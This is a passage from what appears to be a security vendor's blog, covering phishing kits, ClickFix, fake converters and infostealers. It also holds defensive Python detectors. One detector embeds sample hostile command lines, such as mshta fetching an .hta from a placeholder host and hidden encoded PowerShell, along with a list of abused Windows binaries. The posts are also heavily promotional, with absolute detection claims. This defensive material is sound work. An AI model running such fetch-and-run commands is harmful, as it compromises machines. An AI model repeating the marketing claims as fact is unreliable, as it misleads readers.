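    for decoder in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            decoded = decoder(padded).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            continue
        if looks_like_url(decoded):
            return decoded
    return None


def embedded_redirect(url):
    """Return details of the first parameter that points off-site, else None.

    A target on the same host as the link itself is treated as ordinary
    navigation, not as a redirect to another site."""
    outer = urlsplit(url)
    for key, values in parse_qs(outer.query, keep_blank_values=True).items():
        for value in values:
            inner = decode_candidate(value)
            if inner is None:
                continue
            inner_host = urlsplit(inner).hostname
            if inner_host and inner_host != outer.hostname:
                return {"param": key, "outer_host": outer.hostname,
                        "final_host": inner_host, "final_url": inner}
    return None


# Constructed sample links; the base64 target is built here so it is exact.
ENCODED_TARGET = base64.urlsafe_b64encode(
    b"https://account-review.example/login").decode()
SAMPLE_LINKS = [
    "https://trusted-portal.example/redirect?url=https%3A%2F%2Flogin-verify.example%2Fsign-in",
    "https://trusted-portal.example/go?to=" + ENCODED_TARGET,
    "https://trusted-portal.example/search?q=reset+password&page=2",
    "https://trusted-portal.example/out?next=https://trusted-portal.example/home",
    "https://login-verify.example/",
]


def scan_links(links):
    """Return (link, finding) pairs for links that hide another destination."""
    results = []
    for link in links:
        finding = embedded_redirect(link)
        if finding is not None:
            results.append((link, finding))
    return results


if __name__ == "__main__":
    for link, finding in scan_links(SAMPLE_LINKS):
        print(f"{finding['outer_host']} -> {finding['final_host']} "
              f"via parameter '{finding['param']}': {link}")
```

The final host, not the visible one, is what should be checked against reputation data and shown to the user; a same-host target is deliberately ignored so that ordinary post-login redirects on the legitimate site do not generate noise.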

With QR code phishing scams on the rise, it is important to raise awareness of the threat through your security awareness training program. Employees should be warned that QR codes are commonly used by threat actors, and never to follow links encoded in QR codes that arrive via email. It is also recommended to use a phishing simulator to assess whether the workforce is susceptible to QR code phishing attempts. The SafeTitan security awareness training platform allows businesses to easily conduct phishing simulations on the workforce to gauge susceptibility to phishing threats. The phishing simulator will generate relevant training content immediately if a phishing test is failed, ensuring targeted training content is delivered immediately, when it is likely to be most effective at correcting behavior.

Technical defenses should also be implemented. An advanced spam filtering service should be used that is capable of identifying QR codes and following and assessing URLs for phishing content and malware. The outbound spam filter of SpamTitan is capable of following QR codes and assessing content, and in recent tests, correctly identified 100% of phishing attempts. SpamTitan also includes email sandboxing for in-depth analysis of email attachments. A DNS security solution is also recommended for in-depth analysis of URLs for malicious content to provide an extra layer of protection against phishing and malware.

New Phishing Kit Dynamically Displays Relevant Landing Pages Based on DNS Queries

A new phishing-as-a-service (PhaaS) platform has been identified that highlights the sophistication of phishing attacks, and how even cybercriminals with limited skill sets can conduct extremely effective phishing campaigns.

One of the problems when conducting phishing campaigns is ensuring the phishing emails are convincing. Phishing has traditionally been a numbers game, where large volumes of messages are sent in the knowledge that a small number of individuals will be tricked into responding. Those individuals may simply be busy and respond without taking the time to carefully consider what they are being asked, or individuals with poor security awareness. Targeted phishing attempts, termed spear phishing, involve research and are tailored to individuals or small numbers of individuals, and because of the targeting, there is a much higher response rate. The trade-off is that these campaigns involve considerable time and effort.

The new PhaaS platform allows a threat actor to tailor the content to display a fake login page relevant to the individual receiving the message, while still sending a large volume of phishing emails. The phishing kit allows individuals to be tricked by displaying a login prompt that impersonates any of 114 brands in around a dozen different languages, with the content displayed tailored to each individual. The threat actor configures the phishing campaign, sends out phishing emails via the PhaaS kit, and the link in the email directs the recipient to a phishing webpage. The next stage is where the targeting occurs. The kit queries the MX records of the recipient’s email domain using DNS over HTTPS, via Cloudflare or Google, to identify the user’s email service provider. The phishing page is then displayed dynamically based on the result of that query; if no response is received, the phishing page defaults to Roundcube.

DNS queries are fast, so the query and response occur in a fraction of a second, as is the case when a DNS query is sent to identify the IP address of a webpage when browsing the internet. As such, there is only a very small delay, often unnoticeable to the user, before the content is loaded. The result is that if the user’s email service provider is Gmail, they will be presented with a Gmail login prompt, and if they use Microsoft Outlook, they will be presented with a Microsoft login prompt. If the user responds and enters their login credentials, they are captured and sent to the collection server, and the user is redirected to the real login page for that service, most likely unaware that they have been phished. The phishing campaign was identified by Infoblox, which identified thousands of phishing emails sent via the kit. While the kit appears to have been first used in 2020, the number of brands being impersonated has since increased considerably, with support also provided to target users in several languages.
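The provider lookup described above leaves a trace that defenders can hunt for: an ordinary web page has no reason to ask a public DoH resolver for MX records from inside the browser. The following Python is an added example, not code from the original post, from Infoblox or from TitanHQ; the proxy log format, the client addresses and the landing-page host names are constructed for this example, while dns.google and cloudflare-dns.com are the public DoH JSON endpoints the article refers to.

```python
"""Flag browser-originated DNS-over-HTTPS MX lookups in web proxy logs."""
from urllib.parse import urlsplit, parse_qs

# Public DoH JSON endpoints named in the article (Google and Cloudflare).
DOH_HOSTS = {"dns.google", "cloudflare-dns.com"}

# Constructed proxy log lines for this example, one request per line:
# "<timestamp> <client_ip> <method> <url> <referrer-or-dash>"
SAMPLE_LOG = """\
2025-04-10T09:12:01Z 10.0.0.15 GET https://dns.google/resolve?name=example.org&type=MX https://cdn-login-verify.example/index.html
2025-04-10T09:12:02Z 10.0.0.15 GET https://cdn-login-verify.example/assets/app.js https://cdn-login-verify.example/index.html
2025-04-10T09:13:40Z 10.0.0.22 GET https://cloudflare-dns.com/dns-query?name=example.com&type=A -
2025-04-10T09:14:05Z 10.0.0.31 GET https://cloudflare-dns.com/dns-query?name=corp.example.com&type=15 https://secure-mailcheck.example/
2025-04-10T09:15:11Z 10.0.0.31 GET https://www.example.com/ -
"""


def parse_line(line):
    """Split one constructed log line into its five fields."""
    ts, client, method, url, referrer = line.split(" ", 4)
    return {"ts": ts, "client": client, "method": method, "url": url,
            "referrer": None if referrer == "-" else referrer}


def doh_mx_query_domain(url):
    """Return the queried domain if `url` is an MX lookup at a public DoH
    JSON endpoint, else None. Both APIs take name= and type=; the type may
    be the mnemonic "MX" or its numeric record code 15."""
    parts = urlsplit(url)
    if parts.hostname not in DOH_HOSTS:
        return None
    params = parse_qs(parts.query)
    rtype = params.get("type", [""])[0].upper()
    if rtype not in {"MX", "15"}:
        return None
    return params.get("name", [""])[0].lower()


def find_mx_fingerprinting(log_text):
    """Return one finding per DoH MX lookup, with the page that triggered it.

    The referrer is the strongest signal: it names the landing page whose
    script asked which mail provider the visitor uses."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        domain = doh_mx_query_domain(rec["url"])
        if domain is None:
            continue
        landing = urlsplit(rec["referrer"]).hostname if rec["referrer"] else None
        findings.append({"ts": rec["ts"], "client": rec["client"],
                         "queried_domain": domain, "landing_page": landing})
    return findings


if __name__ == "__main__":
    for f in find_mx_fingerprinting(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']} MX lookup for {f['queried_domain']} "
              f"from page {f['landing_page']}")
```

The request path is only visible where the proxy terminates TLS; otherwise only the resolver host name is visible, and that host is also contacted legitimately by browsers with DoH enabled. Browser DoH uses the binary wire format and carries no page referrer, so the combination of the JSON API, an MX record type and a referrer pointing at an unfamiliar login page is the part worth alerting on.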

The phishing kit demonstrates the sophistication of phishing attacks and how threat actors are increasing the effectiveness of their campaigns. Businesses should respond to the evolving threat landscape by adopting a defense-in-depth approach that includes a DNS filtering solution such as WebTitan, advanced spam filtering software such as SpamTitan, and ongoing security awareness training and phishing simulations for the workforce to raise awareness of threats and reduce susceptibility to phishing attempts, using a solution such as SafeTitan.

Hackers Using Free File Conversion Tools for Malware Delivery

Malware is often packaged with software solutions, where the user is given the software they are looking for, but the installer also silently delivers malware to their device. Since the desired product is installed, the user will be unaware that their device has been infected. Malware is often hidden in installers for pirated software or the associated keygen for obtaining the product key. All a threat actor has to do is convince a user to download and execute the installer.

One such campaign involves the use of online document converters, which are used to convert one file type to another. For example, these tools can be used to convert .docx files to .pdf files, create .pdf files from multiple .jpeg images, or convert one audio or video format to another. The Federal Bureau of Investigation (FBI) has been receiving an increasing number of complaints about malware infections from free document converters and download tools. The tool is delivered, but malware is also installed that provides the threat actor with remote access to the infected device, allowing them to steal sensitive data, encrypt files with ransomware, or use the infected device for other nefarious purposes. There are other risks associated with this scam. Cybercriminals in control of these tools are able to scrape sensitive information from the converted files, including passwords, cryptocurrency seeds, email addresses, banking information, and Social Security numbers. Any file uploaded to any online service risks a disclosure of sensitive information.

Traffic can be driven to these doctored or fake installers via links in emails, or malvertising and search engine poisoning. With malvertising and search engine poisoning, cybercriminals target key search terms, such as “free online file converter.” The URLs are made to appear legitimate, such as mimicking a genuine tool and transposing a couple of letters, using hyphenated domain names, or subdomains on an existing site. The site content often appears professional and can be difficult for web users to identify as malicious.

In addition to bundling malware with legitimate software, there are online versions of these tools. The user is instructed to upload the file they wish to convert, and the converted file is downloaded. There have been instances where the converted file is added to a zip file for download, but rather than the converted file, an executable file is delivered, such as a .js file. Attempting to open the file triggers the installation of malware such as a remote access trojan, keylogger, banking trojan, or malware downloader. The popular malware downloader Gootloader has been observed being delivered this way. A Gootloader infection often leads to the delivery of a variety of malware payloads such as banking trojans, information stealers, and post-exploitation tools such as Cobalt Strike beacons.

Due to the increasing use of these tactics, it is important to incorporate them into your security awareness training programs to make users aware of the risks of using free file conversion tools. Before any such tool is used, it is important to conduct research to make sure the tool provider is genuine, and to scan any downloaded installer or converted file with antivirus software. Busy employees who need to quickly convert a file into a different format can easily fall victim to these scams.

In addition to raising awareness of the threat, businesses should consider restricting the types of files that can be downloaded from the Internet. This is easy with WebTitan, a powerful DNS-based web filter that prevents access to malicious websites and blocks unauthorized file downloads from the Internet. WebTitan can be configured to prevent certain employees (non-IT staff, for instance) from downloading executable file types, thereby neutralizing the threat. In addition to serving as an extra layer of protection against malware, WebTitan can also help to curb shadow IT – software installations unknown to the IT department. While these software installations may not contain any malware, they can easily introduce risks and vulnerabilities that can be exploited by hackers.

Give the TitanHQ team a call today to find out more about WebTitan and how it can improve security at your business, and for more information on the SafeTitan security awareness training and phishing simulation platform. TitanHQ also offers antispam software and a Microsoft 365 anti-phishing solution for blocking phishing threats. In recent independent tests, the engine that powers these two solutions achieved top spot for malware, phishing, and spam blocking out of all tested solutions with a perfect 100% block rate in each category and a 0.0% false positive rate.

Three Easy Ways to Improve Your Phishing Defenses

Phishing, and especially email phishing, is the most common attack vector used by cybercriminals and attacks continue to increase year after year. The latest data suggests that around 1.2% of all emails are malicious, which equates to around 3.4 billion malicious emails a day. Threat actors use email to distribute malware, drive traffic to malicious sites to harvest credentials and perform a wide range of scams, including business email compromise, the costliest type of cybercrime, often resulting in millions in losses.

While there are many ways that businesses can be attacked and many steps that can be taken to improve security, ensuring your defenses against email attacks are up to scratch is the best way of improving your security posture. Fortunately, TitanHQ has three easy-to-implement solutions that can greatly improve your defenses against the growing email and phishing threat, all of which are available on a free trial so you can put them to the test to see the difference they make.

Block More Threats with an Advanced Email Filtering Service

SpamTitan is an advanced spam filtering service that is quick and easy to implement, provides exceptional protection against all forms of email attacks, and does not require a degree in cybersecurity to use and maintain. The ease of use of the solution is one of the reasons the solution is popular with businesses from small mom-and-pop stores to large enterprises.

The SpamTitan cloud-based anti-spam service provides cutting-edge protection through a barrage of front-end tests, AI and machine learning-powered detection, twin antivirus engines, and email sandboxing. Suspicious files are sent to the sandbox to be safely detonated and subjected to in-depth behavioral analysis, helping to detect and block zero-day malware threats. In independent tests by VirusBulletin in Q3 2024, SpamTitan was rated in joint first place for detection, sole first place in Q4 2024 with a 100% malware catch rate, 100% phishing catch rate, and a 99.98% spam catch rate, and in February 2024, SpamTitan achieved a perfect score across the board, blocking all threats in the test.

Provide Effective Security Awareness Training to Your Workforce

Technical safeguards will block the vast majority of email threats, but it is inevitable that some threats will reach their intended targets. All it takes is for one employee to respond to a phishing email for a company to suffer a costly data breach or ransomware attack. It is vital that human defenses are strengthened by providing comprehensive security awareness training. The most effective training programs run continuously, with employees given training regularly throughout the year. Only through regular training will you be able to develop a security culture, where employees are constantly looking for potential threats and are conditioned to report suspicious emails to the security team.

The SafeTitan security awareness platform includes an extensive library of enjoyable and engaging training modules on all aspects of security, with each module lasting no longer than 10 minutes for maximum engagement. The platform makes it easy to create training programs for the workforce, tailored for different roles in the organization, and automate those programs so they run continuously throughout the year. Training should be reinforced using phishing simulations, which can be easily created and automated through the SafeTitan platform. When employees fail a phishing simulation, relevant training is generated in real-time to ensure it is delivered when it is likely to have the maximum effect on changing employee behavior.

Improve Microsoft 365 Security with PhishTitan

PhishTitan is an advanced cloud-based anti-phishing solution for Microsoft 365 powered by the same engine behind the award-winning SpamTitan anti-spam service. The solution has been developed to be integrated seamlessly with Microsoft 365 to augment Microsoft’s EOP and Defender protections and catch the threats that these solutions often miss to give true defense-in-depth security. Like SpamTitan, PhishTitan adds layers of analysis and machine learning models to provide cutting-edge protection against phishing. PhishTitan scans all internal and external emails, rewrites URLs to detect links to malicious sites, automatically blocks phishing links in emails to prevent clicks, and provides time-of-click protection by inspecting and evaluating URLs in real-time to detect changes to the destination URL after the emails have been delivered.

PhishTitan adds banners to emails from external sources, helping to combat spoofing and alerting the recipient to take extra care, and also incorporates protection against QR code phishing – quishing – which is growing in prevalence and capable of defeating many email security solutions. The platform also includes an auto-remediation feature, allowing administrators to rapidly remediate threats from users’ inboxes, including cross-tenant features for detection and response by MSPs. One of the main complaints from Microsoft 365 users is the number of phishing emails that bypass defenses; however, with the additional layers of protection provided by PhishTitan, businesses will be better protected against phishing threats.

If you want to improve your defenses against email threats, give the TitanHQ team a call or take advantage of a free trial of TitanHQ solutions to put them to the test in your own environment.

ClickFix Phishing Scam Targets Hospitality Sector Workers

Individuals in the hospitality sector are being targeted in a sophisticated phishing scam that uses the ClickFix phishing technique. The ClickFix campaign has been active since at least December 2024 and is being conducted on targets in North America, Europe, Oceania, South and Southeast Asia.

The phishing emails impersonate booking.com and target staff at hotels, guest houses, and other accommodation providers that are likely to work with booking.com. A wide range of emails have been associated with this ClickFix campaign, including emails that appear to have been sent by prospective guests about the accommodation asking for advice, notifications from booking.com about complaints from guests about previous stays, requesting feedback on the guests’ comments, and security notifications from booking.com about suspicious login attempts.

While the lures are varied, they all use social engineering techniques to trick the recipient into clicking a link, which directs the user to a web page with a fake CAPTCHA overlayed on a visible background that appears to be the Booking.com website. The link may be added to the message body using anchor text to make it appear that the link is legitimate, or in some of the emails, the link is added to a PDF file attachment in an effort to bypass email security solutions.

When the user attempts to complete the CAPTCHA prompt, they are advised of an error and are told they must use a keyboard shortcut (Windows key + R), then CTRL + V to paste a command into the Windows Run window, and press Enter to execute that command. The command copied to the clipboard will download and launch malicious code through mshta.exe, a legitimate Windows process. If the command is executed, it will lead to the delivery of malware such as AsyncRAT, VenomRAT, NetSupport RAT, Danabot, XWorm, and Lumma Stealer. Victims may get a cocktail of malware installed on their device.
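The paste-and-run step above produces a distinctive process tree: a command typed into the Run dialog is spawned by explorer.exe, and the fetcher (mshta.exe in this campaign) carries a URL on its command line. The following Python is an added example for this page, not code from Microsoft or from TitanHQ; the Sysmon-style process creation events are constructed, captcha-verify.example is a placeholder host, and BASE64_PLACEHOLDER stands in for an encoded script.

```python
"""Spot ClickFix-style Run-dialog launches in process creation telemetry."""
import re

# Windows binaries commonly used to fetch and run a remote payload from a
# one-line command. The article names mshta.exe; the rest are common choices.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe",
           "msiexec.exe", "wscript.exe", "cscript.exe", "rundll32.exe",
           "bitsadmin.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# PowerShell switches that hide the window or pass the script as base64.
HIDDEN_INDICATORS = (" -w hidden", " -windowstyle hidden",
                     " -enc ", " -encodedcommand ", " -nop")

# Constructed Sysmon-style process creation events (Event ID 1 fields).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://captcha-verify.example/check.hta',
     "User": "CORP\\frontdesk"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -EncodedCommand BASE64_PLACEHOLDER",
     "User": "CORP\\reception"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe checklist.txt",
     "User": "CORP\\frontdesk"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe",
     "User": "CORP\\itadmin"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\installer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
     "User": "CORP\\itadmin"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_reasons(event):
    """Return the reasons an event looks like a ClickFix execution (empty if
    none). explorer.exe as parent is what a Win+R launch looks like."""
    image = basename(event["Image"])
    if basename(event["ParentImage"]) != "explorer.exe" or image not in LOLBINS:
        return []
    cmd = event["CommandLine"]
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("remote URL in command line")
    if image == "mshta.exe":
        reasons.append("mshta.exe launched from the shell")
    if any(ind in cmd.lower() for ind in HIDDEN_INDICATORS):
        reasons.append("hidden window or encoded command")
    return reasons


def triage(events):
    """Return a summary for every event with at least one reason."""
    findings = []
    for event in events:
        reasons = clickfix_reasons(event)
        if reasons:
            findings.append({"user": event["User"],
                             "image": basename(event["Image"]),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['user']}: {f['image']} -> {', '.join(f['reasons'])}")
```

The parent check keeps the rule quiet for mshta.exe started by an installer, and an interactive cmd.exe or powershell.exe with no arguments is not flagged. Commands entered through the Run dialog are also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting during incident response as a complementary artifact.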

The campaign is being run by a threat actor tracked by Microsoft Threat Intelligence as Storm-1865. Storm-1865 is a financially motivated threat actor that primarily engages in payment data theft and fraudulent charges to victims’ accounts. After achieving its aims, the group may sell access to victims’ devices to other threat actors. Previous campaigns have used similar techniques and have involved messages sent through vendor platforms such as travel agencies, e-commerce platforms, and email services such as Gmail and iCloud mail.

The ClickFix technique was first identified in October 2023 and has been adopted by several different threat actors including financially motivated cybercriminal groups and nation state actors from Russia and North Korea. The lures and malware may differ, but all use social engineering to trick the victim into running a command to fix a fictitious technical issue.

Businesses should ensure they have appropriate defenses to block phishing emails, as the ClickFix technique has proven to be highly effective. TitanHQ offers two solutions for blocking phishing attempts – the SpamTitan spam filtering service and the PhishTitan anti-phishing solution for Microsoft 365 users. The engine that powers both of these solutions was rated #1 out of all tested solutions in the Q4 2024 tests by VirusBulletin, blocking 100% of phishing emails, 100% of malware, and 99.98% of spam emails. In the February 2025 tests, TitanHQ had a perfect score, blocking 100% of malware, phishing, and spam emails with a 0% false positive rate.

SpamTitan incorporates email sandboxing for behavioral analysis of emails and machine-learning algorithms to identify suspicious emails, ensuring an incredibly high detection rate. PhishTitan adds an additional layer of protection for Microsoft 365 accounts, augmenting Microsoft’s protections to identify and block the threats that Microsoft misses. Businesses should also ensure they provide security awareness training to the workforce and conduct phishing simulations of the ClickFix phishing technique. TitanHQ can help in this area with the SafeTitan security awareness training and phishing simulation platform. Call TitanHQ today for more information on phishing defense, or take advantage of the free trial of all of these solutions.

Fake Browser Update Campaign Delivers FrigidStealer Malware to Mac Users

There has been a surge in infostealer malware infections, with detections up almost 60% from the previous year. Infostealers gather system information, stored files, and sensitive data and exfiltrate the information to their command and control server. Once installed, they can remain undetected for long periods of time, exfiltrating sensitive data such as usernames and passwords by logging keystrokes, with some variants capable of taking screenshots and capturing audio and video by taking control of the microphone and webcam.

The majority of infostealers are used to attack Windows systems; however, a new infostealer called FrigidStealer has been identified that is being used to target Mac users. FrigidStealer is capable of stealing saved cookies, password-related files in the Safari and Chrome browsers, and login credentials, along with cryptocurrency wallet credentials, Apple Notes containing passwords, documents, spreadsheets, text files, and other sensitive data from the user’s home directory. The gathered data is added to a compressed file in a hidden folder in the user’s home directory and is exfiltrated to its command and control server.

The threat actor behind the campaign distributes FrigidStealer under the guise of important web browser updates on compromised websites. The threat actor injects malicious JavaScript into the HTML of the webpage which generates a fake browser update notification to website visitors. The notifications warn the user that they must update their browser to continue to view the page, with the displayed notification tailored to the browser in use.

The notifications look professional, include the appropriate logos for either Google Chrome or Safari, and contain an update button that the user must click to proceed. Clicking the button will trigger the download of an installer (DMG file), which must be manually launched. The user is required to enter their password to get around macOS Gatekeeper protections. If the password is entered, the file is executed and FrigidStealer is delivered.

A similar campaign is being conducted targeting Windows users. The Windows campaign uses similar techniques, although it tricks the user into downloading and executing an MSI installer, which delivers one of two different info stealers, Lumma Stealer or DeerStealer. The threat actor is also targeting Android devices in a similar way, delivering an APK file that contains the Marcher banking Trojan.

With infostealer infections soaring, businesses need to make sure they have the right security solutions in place and should be providing regular security awareness training to the workforce. Employees should be instructed to never download browser updates when prompted to do so on websites or run any suggested commands on their devices, as the updates and commands are likely to be malicious.

A web filter is strongly recommended for controlling access to the Internet and blocking visits to malicious websites. The WebTitan DNS filter can be used to protect users on or off the network and is constantly updated with threat intelligence on new malicious websites. If an attempt is made to visit a known malicious website, that attempt will be blocked. The web filter can also be configured to block file downloads from the Internet by file type, allowing IT teams to prevent employees from downloading executable files.
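Blocking downloads "by file type" is only as good as how the type is decided: a lure can serve an installer under an image-like name or a misleading Content-Type header. The following added example (not WebTitan's or any vendor's code) classifies a download by its bytes rather than its extension, using an assumed signature table for the installer formats named above (EXE, MSI, APK, DMG) and constructed sample byte strings rather than real files. The hostnames and file names are placeholders.

```python
"""Content-based file-type blocking for downloads.

Added example, not WebTitan's or any vendor's code: it shows why a download
policy should classify by file content rather than by extension or declared
type. The signature table and samples below are constructed for this example
and cover only the installer formats discussed above.
"""
from typing import Tuple

# Leading-byte signatures (assumed table for this example).
HEADER_MAGIC = [
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "msi"),  # OLE2 compound file, used by MSI installers
    (b"MZ", "exe"),                                # Windows PE executable
    (b"PK\x03\x04", "zip"),                        # ZIP container; APKs are ZIPs
]
KOLY_TRAILER_LEN = 512  # a UDIF .dmg ends with a 512-byte trailer that starts with "koly"

BLOCKED_TYPES = {"exe", "msi", "dmg", "apk"}


def sniff_type(data: bytes) -> str:
    """Classify a download by its bytes. Returns one of the types above or 'other'."""
    for magic, kind in HEADER_MAGIC:
        if data.startswith(magic):
            if kind == "zip" and b"AndroidManifest.xml" in data:
                return "apk"  # a ZIP carrying an Android manifest is an APK
            return kind
    # DMG is recognised from the END of the file, so the whole object must be available.
    if len(data) >= KOLY_TRAILER_LEN and data[-KOLY_TRAILER_LEN:-KOLY_TRAILER_LEN + 4] == b"koly":
        return "dmg"
    return "other"


def evaluate_download(filename: str, data: bytes) -> Tuple[str, str]:
    """Return (decision, reason). Blocks by sniffed type and names the case where
    executable content hides behind a harmless-looking extension."""
    kind = sniff_type(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if kind in BLOCKED_TYPES:
        if ext and ext != kind and not (kind == "apk" and ext == "zip"):
            return "block", f"{kind} content disguised as .{ext}"
        return "block", f"{kind} download not permitted by policy"
    return "allow", f"{kind} content"


# Constructed samples (not real files): minimal byte strings carrying the signatures.
SAMPLES = {
    "ChromeUpdate.dmg": b"\x00" * 600 + b"koly" + b"\x00" * 508,
    "update.msi": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64,
    "update.apk": b"PK\x03\x04" + b"\x00" * 30 + b"AndroidManifest.xml" + b"\x00" * 30,
    "logo.png": b"MZ" + b"\x00" * 100,           # executable disguised with an image extension
    "report.zip": b"PK\x03\x04" + b"\x00" * 100,  # plain archive, allowed by this policy
    "notes.txt": b"meeting notes\n",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, *evaluate_download(name, blob))
```

Two points the code makes explicit: the DMG check reads the trailer, so a gateway that inspects only the first few kilobytes of a stream cannot make this decision, and a mismatch between sniffed type and extension is itself worth logging, since it is a stronger signal than either the name or the declared MIME type alone.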

While this is a web-based campaign, information stealers are commonly distributed in phishing emails, either through malicious attachments or embedded hyperlinks. TitanHQ’s SpamTitan cloud-based anti-spam service is a powerful AI-driven email security solution with email sandboxing and advanced threat detection capabilities. SpamTitan outperformed all other tested solutions in recent tests by VirusBulletin, blocking 100% of phishing emails and 100% of malware.

TitanHQ Achieves Perfect Performance in February Virus Bulletin Tests

TitanHQ’s SpamTitan and PhishTitan solutions achieved perfect scores in the Virus Bulletin tests in February, blocking 100% of phishing emails, 100% of spam emails, and 100% of malware, with a 0% false positive rate. The unbeatable test scores in the latest round of tests follow impeccable scores in Q4, 2024, when the engine that powers the SpamTitan and PhishTitan solution ranked top out of all tested email security solutions with a 100% phishing and malware detection rate, and a 0.00% false positive rate. The high scores in Q4, 2024 saw TitanHQ ranked in 1st place for overall score, beating all other market-leading anti-spam software solutions including the anti-spam solutions from Mimecast, N-Able, Fortinet, Sophos, and others. In the previous quarter, TitanHQ ranked joint first. The strong performance in the tests earned TitanHQ its third consecutive VBSpam+ award.

Virus Bulletin is a highly respected security information portal and certification body that has earned an excellent reputation among the information security community by providing independent intelligence about the latest global threats. Virus Bulletin has been conducting regular benchmarking tests of security solutions for more than 20 years, with the test results giving IT security professionals invaluable information on the most effective security solutions to deploy to stop malware and phishing threats.

The latest round of tests was conducted over 16 days in February, with the SpamTitan and PhishTitan solutions blocking all threats and spam emails. The final results for Q1, 2025 are due to be announced at the end of March, with TitanHQ on track to earn its fourth consecutive VBSpam+ certification. “We’re excited to have significantly exceeded the industry benchmark in these interim results,” said Ronan Kavanagh, CEO at TitanHQ. “We’re now on track to receive a fourth consecutive VB+ award in Q1. These results highlight our relentless dedication to delivering top-tier email security, and we will continue safeguarding our clients against emerging cyber threats.”

The exceptional detection rates have prompted many managed services providers to migrate to TitanHQ from other solutions, keen to ensure their clients get the very best protection. Not only does TitanHQ deliver immediate and substantial threat mitigation, all solutions have been developed from the ground up to meet all the needs of MSPs, ensuring exceptional protection with minimal management overhead.

The SpamTitan spam filtering service includes a spam filter for incoming mail, an outbound spam filter, email sandboxing, dual antivirus engines, malicious link detection, and machine learning-based detection, ensuring exceptional protection from the full range of email threats. The next-generation email sandbox detects malware based on its behavior, allowing novel malware threats to be detected that signature-based detection misses while only causing minimal delays to message delivery. In the tests, TitanHQ was in the green for all speed tests.

If you want the very best in threat protection and exceptional value for money, why not make the switch to TitanHQ. Give the team a call today to find out more or take advantage of the free trial and see the difference TitanHQ solutions make.

Researchers Confirm Massive Threat From Information Stealing Malware

Cybercriminals have extensively used ransomware in their attacks on businesses, government entities, and critical infrastructure, and while these attacks often make headline news and cause massive disruption, there is a much more common malware threat – information stealers.

Information stealers are malware that is silently installed on devices that can remain undetected for long periods of time. These types of malware have many different capabilities and can serve as downloaders for other malicious payloads, but their main function is information theft. Information theft is achieved in several ways, depending on the malware variant in question. These malware types often have keylogging capabilities and can record keystrokes as they are entered on the keyboard, allowing sensitive information such as usernames and passwords to be captured. They can often record audio from the microphone, take control of the webcam and record video, and take screenshots. They can also steal browser histories, cookies, and other sensitive information.

The information stolen from the victim allows the threat actor to conduct follow-on attacks, access accounts and steal further sensitive data, access and drain financial accounts, or commit identity theft and other types of fraud. Information stealers can also provide a threat actor with access to a device, and that access is often sold to specialized cybercriminal groups such as ransomware actors. Many hackers now act as initial access brokers, using information stealers to gain access before selling that access to other cybercriminal groups.

Information stealers such as Lumma, AgentTesla, FormBook, Redline, and StealC have been increasingly used in recent years, especially last year. Check Point observed a 58% increase in attacks from the previous year, and a report from the threat intelligence firm KELA suggested that lists of credentials obtained from information stealers are being shared on cybercrime forums. The credential lists included billions of logins captured from infected devices; according to KELA, the logs came from around 4.3 million devices and contained around 330 million stolen credentials, an estimated 40% of which were corporate credentials.

The breach notification service, Have I Been Pwned (HIBP), has recently added 284 million compromised accounts to the service. The credentials were identified from chats on a Telegram channel called ALIEN TXTBASE, with the data obtained from information stealer logs. HIBP founder Troy Hunt said the stealer logs included 23 billion rows of data with 493 million unique website and email address pairs and around 284 million unique email addresses. Hunt said 244 million passwords were not previously known to the HIBP service, with 199 million already in its database.

The extent to which these malware variants are used, and the increase in use in 2024, clearly demonstrates the importance of advanced malware protection and the sheer number of compromised credentials suggests many businesses have been infected with information stealers. The problem for businesses is that these malware variants can be difficult to identify, as new versions are constantly being released. Traditional antivirus software is signature-based, which means it can only detect known malware. When new malware is identified, a signature of that malware is obtained and fed into antivirus software. If a malware signature is not in the software’s definition list, it will not be detected. There are several ways that these information stealers are distributed, with email being one of the most common. They can also be downloaded from the internet from malicious websites in drive-by downloads or installed along with pirated software or doctored versions of legitimate software installers.

Defending against information stealers requires a combination of measures – a defense-in-depth approach, with multiple overlapping layers of security. Given the high volume of infections stemming from email, businesses need a spam filter to block malicious emails. Antispam software will block many malicious emails; however, an antispam server must have advanced antimalware defenses. That means traditional signature-based detection and advanced behavioral detection to ensure previously unseen malware is identified and blocked.

SpamTitan uses dual anti-virus engines for detecting known threats and a next-generation email sandbox for behavioral analysis. If standard checks are passed, suspicious messages are sent to the sandbox – a safe environment where they are detonated and their behavior is analyzed. This vastly improves the detection rate, and in recent independent tests, SpamTitan outperformed all other tested email security solutions and had a 100% malware detection rate.

